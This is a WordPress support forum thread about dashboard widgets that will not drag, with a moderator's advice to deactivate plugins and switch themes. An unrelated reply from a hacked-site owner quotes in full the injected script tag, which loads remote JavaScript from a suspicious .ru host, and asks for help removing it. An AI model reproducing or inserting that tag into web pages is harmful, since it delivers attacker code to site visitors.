Support » Plugins » Plug ins

  • Hi, my problem is:
    When I am in my Dashboard attempting to activate the Widgets, none of my widgets will drag across the page?
    Can anyone tell me what the prob could be.
    I have tried FF and Chrome.
    A happy to New Year to all.
    Regards.Steve.

Viewing 3 replies - 1 through 3 (of 3 total)
  • esmi

    (@esmi)

    Forum Moderator

    Have you tried:

    – deactivating all plugins to see if this resolves the problem? If this works, re-activate the plugins one by one until you find the problematic plugin(s).

    – switching to the default theme to rule out any theme-related problems?

    Could be your theme, they dont all support widgets? I am currently using a theme that does not support widgets. I have the same problem.

    Not a solution but maybe help you problem solve. Try a basic theme briefly. If problem solved its the theme.

    I’ll watch with interest cos I’d like to add widgets to my sidebar.

    Help!
    My website was attacked by Unknown Evil, They inserted script as follow:

    <script id=”Kgb2aemtxg” type=”text/javascript” src=”http://mihanblog-com.monografias.com.sina-com-cn.guidebat.ru:8080/google.com/google.com/perezhilton.com/foodnetwork.com/google.cl/” defer=”defer”>

    I cleaned all database, changed pw, even asked the web host company to created new account, but it’s still getting the same problem ; Is there any one know how solve this problem ? please help.!
    Thanks
    HT

Viewing 3 replies - 1 through 3 (of 3 total)
  • The topic ‘Plug ins’ is closed to new replies.